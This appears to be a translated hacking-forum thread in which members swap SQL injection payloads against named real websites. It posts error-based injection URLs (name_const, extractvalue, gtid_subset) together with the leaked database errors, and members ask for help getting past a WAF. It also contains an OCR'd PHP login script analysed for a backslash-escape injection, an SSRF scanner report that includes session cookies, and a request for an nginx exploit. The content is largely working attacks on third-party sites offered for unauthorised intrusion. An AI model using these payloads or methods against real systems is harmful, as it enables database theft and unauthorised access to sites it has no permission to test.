Your questions about vulnerabilities.

Discussion in 'Vulnerabilities' started by +, 27 Apr 2015.

  1. joelblack (Reservists Of Antichat)
    Code:
    http://metroeyesng.com/?/product/online_store/&prd_id=11'AND+polygon((select*from(select name_const(version(),1))x))+--+-

    Code:
    Illegal non geometric '(select `x`.`5.5.55-38.8-log` from (select NAME_CONST(version(),1) AS `5.5.55-38.8-log`) `x`)' value found during parsing
    SELECT * FROM mc_product WHERE prd_store='online_store' AND prd_id='11'AND polygon((select*from(select name_const(version(),1))x)) -- -'
     
  2. kacergei (Member)
    Could you tell me how to extract the DB/table names in situations like this? I tried wrapping it in hex as well, but it doesn't work (or maybe my hands just aren't up to it(( )
     
  3. Тот_самый_Щуп (Reservists Of Antichat)
    joelblack, what's the point of giving a vector with name_const? Especially to a newbie.
     
  4. Octavian (Elder)
    Is there a vulnerability here?
    [image]
     
  5. Тот_самый_Щуп (Reservists Of Antichat)
    Lol, couldn't you post it as plain text?
    And what's the point of cutting out all the "dangerous" characters when mysql_real_escape_string() is our everything? I didn't bother squinting at the rest of that mess in picture form.
     
  6. kacergei (Member)
    Out of an excess of free time))) I ran his picture through FineReader, for the convenience of other users) Hopefully without errors (the picture's resolution is rather low...))
    PHP:
    <?php
    /**
     * Login form handling
     *
     * @author      Cusnir Simion <cusnir.simion@webmaster.md>
     * @copyright   Copyright (c) 2016 Webmaster Studio https://www.webmaster.md
     * @version     3.0 Date 2016-06-04
     * @link        /ws/lock.php
     */
    ?>
    <?php
    include($_SERVER["DOCUMENT_ROOT"] . "ws/include.php");

    if ((isset($_POST['login']) && $_POST['login']) and (isset($_POST['pass']) && $_POST['pass'])) {
        if (isset($_SESSION['captcha_keystring']) && $_SESSION['captcha_keystring'] == $_POST['keystring']) {

            // "Sanitise" the login: strip a fixed list of characters, then cut to 25 chars.
            $ar_clean_post = filter_input_array(INPUT_POST, FILTER_SANITIZE_STRING);
            $login = str_replace(array(" ", "'", "\"", "(", ")"), "", $ar_clean_post['login']);
            $login = mb_substr($login, 0, 25, 'UTF-8');

            // Double SHA-512 of the password, salted on the second round.
            $pass = hash('sha512', $ar_clean_post['pass']);
            $pass = hash('sha512', $pass . $_security_salt); //show($pass); exit;

            // Query built by string interpolation of $login and $pass.
            // Identifier quoting is backticks here; the OCR of the screenshot rendered them as single quotes.
            $result = mysql_query("SELECT * FROM `ws_users` WHERE `login`='$login' AND `pass`='$pass' AND active = 1 AND block = 0 LIMIT 1");

            if (mysql_num_rows($result) !== 1) {
                $_SESSION['auth_error'] = '<div class="alert alert-danger">' . $GLOBALS['ar_define_langterms']['MSG_ADMIN_WRONG_AUTH_DATA'] . '</div>';
            } else {
                $us_data = mysql_fetch_array($result);
                if ($us_data['block']) {
                    $_SESSION['auth_error'] = '<div class="alert alert-danger">' . $GLOBALS['ar_define_langterms']['MSG_ADMIM_IS_BLOCKED'] . '</div>';
                } else {
                    // remember the user.
                    $login_crypt = crypt($login);
                    $res_mem = mysql_query("UPDATE ws_users SET login_crypt='$login_crypt', `auth_date` = NOW() WHERE login='$login'");

                    $_SESSION['login'] = $login;
                    $_SESSION['mem']   = $login_crypt;
                    $_SESSION['image'] = $us_data['image'];
                }
            }
        } else {
            $_SESSION['auth_error'] = '<div class="alert alert-danger">' . $GLOBALS['ar_define_langterms']['MSG_ADMIN_BAD_CAPTCHA'] . '</div>';
        }
    }

    unset($_SESSION['captcha_keystring']);

    // Redirect back to wherever the form was submitted from.
    if ($_SERVER['HTTP_REFERER'])
        header("Location: " . $_SERVER['HTTP_REFERER']);
    else
        header("Location: /ws/");
    ?>
     
    #2406 kacergei, 28 Aug 2018
    Last edited: 28 Aug 2018
  7. Octavian (Elder)
    The picture's perfectly fine!
     
  8. crlf (Green member)
    No. Except maybe breaking the query with a backslash.

    Keep us posted.
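crlf's backslash remark, worked through as an added example (not code from the thread or from the site's authors): Python stands in for the PHP, re-creating the posted login filter and showing how MySQL would read the string literals of the resulting query, next to a parameterised lookup against a constructed in-memory table. The table and column names come from the posted script; the hash value is a constructed stand-in.

```python
import sqlite3

STRIPPED = " '\"()"  # characters the posted lock.php removes from login with str_replace()
DEMO_HASH = "H" * 16  # constructed stand-in for the script's double-sha512 value

def filter_login(login: str) -> str:
    """Reimplements the posted filter: drop the listed characters, keep 25 chars."""
    return login.translate(str.maketrans("", "", STRIPPED))[:25]

def build_query_unsafe(login: str, pass_hash: str) -> str:
    """The string-built SELECT from the posted script, filtered login spliced in."""
    return ("SELECT * FROM `ws_users` WHERE `login`='%s' AND `pass`='%s' "
            "AND active = 1 AND block = 0 LIMIT 1" % (login, pass_hash))

def mysql_string_literals(sql: str):
    """Single-quoted literals as MySQL reads them (backslash escapes the next char,
    '' is a quote). Returns (literals, balanced); unbalanced means a syntax error."""
    literals, i, n = [], 0, len(sql)
    while True:
        i = sql.find("'", i)
        if i < 0:
            return literals, True
        i, buf = i + 1, []
        while i < n:
            c = sql[i]
            if c == "\\" and i + 1 < n:
                buf.append(sql[i + 1]); i += 2
            elif c == "'" and i + 1 < n and sql[i + 1] == "'":
                buf.append("'"); i += 2
            elif c == "'":
                i += 1; break
            else:
                buf.append(c); i += 1
        else:
            return literals + ["".join(buf)], False  # unterminated literal
        literals.append("".join(buf))

def make_demo_db():
    """Constructed in-memory table with the columns the script's query touches."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE ws_users (login TEXT, pass TEXT, active INT, block INT)")
    conn.execute("INSERT INTO ws_users VALUES ('admin', ?, 1, 0)", (DEMO_HASH,))
    return conn

def lookup_user_safe(conn, login: str, pass_hash: str):
    """Parameterised form: login is bound as data, so a trailing backslash matches no row."""
    cur = conn.execute("SELECT login FROM ws_users WHERE login=? AND pass=? "
                       "AND active=1 AND block=0 LIMIT 1", (login, pass_hash))
    return cur.fetchone()
```

A login of `admin\` passes the filter untouched, and the `\'` it produces turns the closing quote into an escaped character, so the literal swallows the following ` AND \`pass\`=` and the statement ends unbalanced; the bound-parameter version simply finds no user.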
     
  9. crlf (Green member)
    On modern versions it won't output anything except version(); it doesn't accept subqueries. You need to look for another vector.
     
  10. Sensoft (Member)
    Server side request forgery
    The scanner reports it, but when I started digging in I realised it seems to be a false positive.
    Well, I'm all thumbs; what does anyone have to say about this?


    Code:
    Attack details
    
    URL encoded GET input was set to http://hitLVcyIasXkF.bxss.me/
    
    An HTTP request was initiated for the domain hitLVcyIasXkF.bxss.me which indicates that this script is vulnerable to SSRF.
    
    HTTP request details:
    IP address: 91.204.73.53
    User agent: Web Optimizer Downloader
    
    HTTP request
    
    GET /sites/all/modules/weboptimizer/web-optimizer/cache/wo.static.php?http://hitLVcyIasXkF.bxss.me/ HTTP/1.1
    Cookie: SESSb528791853c11d9e7e82fab0a8e003d2=kvpg8nj53d8rjuceaktobpo0p2; _ym_uid=1536190447487022978; _ym_d=1536190447; _ym_isad=2; _ym_visorc_22122178=w; jv_enter_ts_vIAkaUXWoO=1536190587910; jv_visits_count_vIAkaUXWoO=1; jv_refer_vIAkaUXWoO=http%3A%2F%2Fwww.acunetix-referrer.com%2Fjavascript%3AdomxssExecutionSink(0%2C%22'%5C%22%3E%3Cxsstag%3E()refdxss%22); jv_utm_vIAkaUXWoO=; jv_pages_count_vIAkaUXWoO=4; yp=1851550627.yrtsi.1536190627; yandexuid=3741984211536190850; yabs-sid=863698391536190850; przvdom=aec9e0b96eda1de56e7eca16487d8d2ef79cce42ed4c98f1c0c900b331344c90; przvlng=ru; przvgl=6c2147e2951f84179d9f2216c0be95adbabf6df2deaa2e03910bfa85f2369217; przvusr=e58c712e76e2839e403274f18df9c76c81e49678fb83c2f3b64b7a13cfdc21ae; przvonline=1; przvdistance=0; jv_close_time_vIAkaUXWoO=1536191313662
    Host: dominant-telecom.ru
    Connection: Keep-alive
    Accept-Encoding: gzip,deflate
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
    Accept: */*
     
  11. Тот_самый_Щуп (Reservists Of Antichat)
    Sensoft, what scanner was used?
     
  12. Sensoft (Member)
    Acunetix
     
  13. kacergei (Member)
    Help me pick a vector, I can't figure out what's being filtered(
    I almost always run into the error: 412 Precondition Failed

    At least I got some different output with requests like these:
    Code:
    URL: demo.site.net/index.php?information_id=3&route=information/information%27and(extrac-tvalue(null,con-cat(1,(select+user()))))=%271/251
    
    Fatal error: Uncaught Exception:
    Error: Unknown column 'extrac' in 'where clause'
    Error No: 1054
    SELECT * FROM `oc_url_alias` WHERE `query` = 'information/information'and(extrac-tvalue(null,con-cat(1,(select user()))))='1/251' in /home/www/demo.site.net/system/database/mysqli.php:39
    Stack trace:
    #0 /home/www/demo.site.net/vqmod/vqcache/vq2-system_library_db.php(20): DBMySQLi->query('SELECT * FROM `...', Array)
    #1 /home/www/demo.site.net/system/library/dbmemory.php(16): DB->query('SELECT * FROM `...')
    #2 /home/www/demo.site.net/catalog/controller/common/seo_url.php(95): Dbmemory->query('SELECT * FROM `...')
    #3 /home/www/demo.site.net/vqmod/vqcache/vq2-system_engine_front.php(41): ControllerCommonSeoUrl->index()
    #4 /home/www/demo.site.net/vqmod/vqcache/vq2-system_engine_front.php(19): Front->execute(Object(Action))
    #5 /home/www/demo.site.net/index.php(237): Front->dispatch(Object(Action), Object(Action))
    #6 {main} thrown in /home/www/demo.site.net/system/database/mysqli.php on line 39

    Code:
    URL: demo.site.net/index.php?information_id=3&route=information/information%27and(oc_user())=%27
    Fatal error: Uncaught Exception: Error: FUNCTION vilmargp_demo.oc_user does not exist
    Error No: 1305
    SELECT * FROM `oc_url_alias` WHERE `query` = 'information/information'and(oc_user())='' in /home/www/demo.site.net/system/database/mysqli.php:39
    Stack trace:
    #0 /home/www/demo.site.net/vqmod/vqcache/vq2-system_library_db.php(20): DBMySQLi->query('SELECT * FROM `...', Array)
    #1 /home/www/demo.site.net/system/library/dbmemory.php(16): DB->query('SELECT * FROM `...')
    #2 /home/www/demo.site.net/catalog/controller/common/seo_url.php(95): Dbmemory->query('SELECT * FROM `...')
    #3 /home/www/demo.site.net/vqmod/vqcache/vq2-system_engine_front.php(41): ControllerCommonSeoUrl->index()
    #4 /home/www/demo.site.net/vqmod/vqcache/vq2-system_engine_front.php(19): Front->execute(Object(Action))
    #5 /home/www/demo.site.net/index.php(237): Front->dispatch(Object(Action), Object(Action))
    #6 {main} thrown in /home/www/demo.site.net/system/database/mysqli.php on line 39
    
    vilmargp_demo
     
    #2413 kacergei, 10 Sep 2018
    Last edited: 10 Sep 2018
  14. Sensoft (Member)
    There's a WAF there:
    "Your request was filtered due to possible security problems."
    Look for tampers that fit; there's no other way.
    Or find an SQL injection guru; there are some unique people here who can unravel it by hand, and the WAF there doesn't seem very good.
     
    #2414 Sensoft, 10 Sep 2018
    Last edited: 10 Sep 2018
  15. joelblack (Reservists Of Antichat)
    Code:
    http://demo.villagedefrance.net/index.php?information_id=3&route=information/information' AND gtid_subset(user(),0) AND '1#
    Code:
    Fatal error: Uncaught Exception: Error: Malformed GTID set specification '[email protected]'.<br />Error No: 1772<br />SELECT * FROM `oc_url_alias` WHERE `query` = 'information/information' AND gtid_subset(user(),0) AND '1' in /home/www/demo.villagedefrance.net/system/database/mysqli.php:39 Stack trace: #0 /home/www/demo.villagedefrance.net/vqmod/vqcache/vq2-system_library_db.php(20): DBMySQLi->query('SELECT * FROM `...', Array) #1 /home/www/demo.villagedefrance.net/system/library/dbmemory.php(16): DB->query('SELECT * FROM `...') #2 /home/www/demo.villagedefrance.net/catalog/controller/common/seo_url.php(95): Dbmemory->query('SELECT * FROM `...') #3 /home/www/demo.villagedefrance.net/vqmod/vqcache/vq2-system_engine_front.php(41): ControllerCommonSeoUrl->index() #4 /home/www/demo.villagedefrance.net/vqmod/vqcache/vq2-system_engine_front.php(19): Front->execute(Object(Action)) #5 /home/www/demo.villagedefrance.net/index.php(237): Front->dispatch(Object(Action), Object(Action)) #6 {main} thrown in /home/www/demo.villagedefrance.net/system/database/mysqli.php on line 39
     
  16. Тот_самый_Щуп (Reservists Of Antichat)
    joelblack, nicely trolled :D
     
  17. Тот_самый_Щуп (Reservists Of Antichat)
    Yes, there are vulnerabilities in that code. No need to thank me.
     
  18. Sensoft (Member)
    Is there an exploit for nginx 1.13.9?
     
  19. Тот_самый_Щуп (Reservists Of Antichat)
    man474019: nothing to do this.
    The request is then force-clipped to 14 characters. Look for SQL in other places, and there will be happiness.
     
  20. Тот_самый_Щуп (Reservists Of Antichat)
    At this place: no way (this is not a MySQL limit). Look for another vulnerable place.
     